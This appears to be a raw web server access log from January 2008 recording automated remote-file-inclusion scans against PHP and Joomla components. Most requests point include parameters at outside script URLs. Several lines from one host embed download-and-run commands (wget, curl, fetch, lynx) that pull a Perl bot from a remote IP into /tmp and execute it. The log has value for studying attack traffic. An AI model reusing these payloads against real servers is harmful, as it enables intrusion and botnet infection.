80.237.203.157 - - [16/Jan/2008:11:32:31 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:11:32:32 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:11:32:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:11:32:39 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:11:33:01 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:33:29 -0800] "GET /logs/access_071219.log//[flat_php_board_path]index.php?a=viewprofile&username=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:33:29 -0800] "GET //[flat_php_board_path]index.php?a=viewprofile&username=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:33:29 -0800] "GET /logs//[flat_php_board_path]index.php?a=viewprofile&username=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.52 - - [16/Jan/2008:11:34:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.246.77.52 - - [16/Jan/2008:11:34:07 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:11:34:13 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:11:34:13 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.194.74.238 - - [16/Jan/2008:11:34:46 -0800] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.194.74.238 - - [16/Jan/2008:11:34:46 -0800] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:34:50 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:34:51 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:34:51 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:35:22 -0800] "GET /logs/access_071220.log//[flat_php_board_path]index.php?a=viewprofile&username=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:11:35:35 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:11:35:35 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:35:42 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.82.51.98 - - [16/Jan/2008:11:35:53 -0800] "HEAD / HTTP/1.0" 200 0 "-" "PHP version tracker (http://www.nexen.net/phpversion/bot.php)" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:11:36:09 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:11:36:39 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:11:36:39 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:37:01 -0800] "GET /logs/access_071229.log//tool/skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:37:06 -0800] "GET /logs/access_071225.log//tool/modules/TotalCalendar/about.php?inc_dir=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:37:07 -0800] "GET //tool/modules/TotalCalendar/about.php?inc_dir=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:37:07 -0800] "GET /logs//tool/modules/TotalCalendar/about.php?inc_dir=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.254.203.35 - - [16/Jan/2008:11:40:18 -0800] "GET /logs/access_071229.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ebaydetectives.de/files/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.203.35 - - [16/Jan/2008:11:40:18 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ebaydetectives.de/files/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.203.35 - - [16/Jan/2008:11:40:18 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ebaydetectives.de/files/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:40:31 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:40:32 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:40:32 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:40:50 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:11:41:03 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:11:41:03 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:41:17 -0800] "GET /logs/access_071230.log//tool/modules/TotalCalendar/about.php?inc_dir=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.110.68 - - [16/Jan/2008:11:42:14 -0800] "GET /logs//components/com_joomlaxplorer/admin.joomlaxplorer.php&mosConfig_absolute_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [16/Jan/2008:11:42:15 -0800] "GET //components/com_joomlaxplorer/admin.joomlaxplorer.php&mosConfig_absolute_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.25.169 - - [16/Jan/2008:11:42:25 -0800] "GET /logs/access.log/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [16/Jan/2008:11:42:25 -0800] "GET /newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [16/Jan/2008:11:42:25 -0800] "GET /logs/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.84.154 - - [16/Jan/2008:11:42:27 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/b1u5crew/99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.110.68 - - [16/Jan/2008:11:44:35 -0800] "GET /logs//components/com_joomlaxplorer/admin.joomlaxplorer.php&mosConfig_absolute_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [16/Jan/2008:11:44:35 -0800] "GET //components/com_joomlaxplorer/admin.joomlaxplorer.php&mosConfig_absolute_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.185.162.14 - - [16/Jan/2008:11:46:06 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:11:46:41 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:11:46:41 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:11:46:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:48:40 -0800] "GET /logs/access_071228.log/index.php?sub=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:48:40 -0800] "GET /index.php?sub=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:48:41 -0800] "GET /logs/index.php?sub=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:11:50:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:11:50:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:11:51:55 -0800] "GET /logs/impex/ImpExData.php?systempath=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:11:51:55 -0800] "GET /impex/ImpExData.php?systempath=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:52:03 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:52:04 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:11:52:04 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:05 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:05 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:06 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:06 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:07 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:07 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.182.30.9 - - [16/Jan/2008:11:53:08 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.52 - - [16/Jan/2008:11:53:12 -0800] "GET /impex/ImpExData.php?systempath=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.246.77.52 - - [16/Jan/2008:11:53:12 -0800] "GET /logs/impex/ImpExData.php?systempath=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
70.86.84.154 - - [16/Jan/2008:11:55:02 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/b1u5crew/99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.84.154 - - [16/Jan/2008:11:55:02 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/b1u5crew/99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.90.125.203 - - [16/Jan/2008:11:56:14 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://kadausa.org/login? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
63.90.125.203 - - [16/Jan/2008:11:56:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kadausa.org/login? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.80.123.56 - - [16/Jan/2008:11:56:24 -0800] "GET //[flat_php_board_path]index.php?a=viewprofile&username=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.107 - - [16/Jan/2008:11:57:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.107 - - [16/Jan/2008:11:57:39 -0800] "GET /drop/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.213.160 - - [16/Jan/2008:11:57:43 -0800] "GET /logs/access_071230.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [16/Jan/2008:11:57:44 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [16/Jan/2008:11:57:45 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.164.133.203 - - [16/Jan/2008:11:58:02 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:11:59:25 -0800] "GET /logs/access.log/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:11:59:26 -0800] "GET /newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:11:59:26 -0800] "GET /logs/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.84.154 - - [16/Jan/2008:12:00:25 -0800] "GET /logs/access_071228.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/b1u5crew/99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:00:44 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:00:44 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:00:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:00:45 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.243.81.37 - - [16/Jan/2008:12:01:16 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.243.81.37 - - [16/Jan/2008:12:01:17 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:01:27 -0800] "GET /logs/access.log/modifyform.html?code=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:01:27 -0800] "GET /modifyform.html?code=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:12:01:27 -0800] "GET /logs/modifyform.html?code=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.145.201.10 - - [16/Jan/2008:12:01:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
83.145.201.10 - - [16/Jan/2008:12:01:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
211.114.48.225 - - [16/Jan/2008:12:02:15 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
211.114.48.225 - - [16/Jan/2008:12:02:15 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
211.233.19.105 - - [16/Jan/2008:12:02:40 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
211.233.19.105 - - [16/Jan/2008:12:02:40 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
211.233.19.105 - - [16/Jan/2008:12:02:40 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
211.233.19.105 - - [16/Jan/2008:12:02:40 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tauchen.ge-nettetal.de/contenido/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
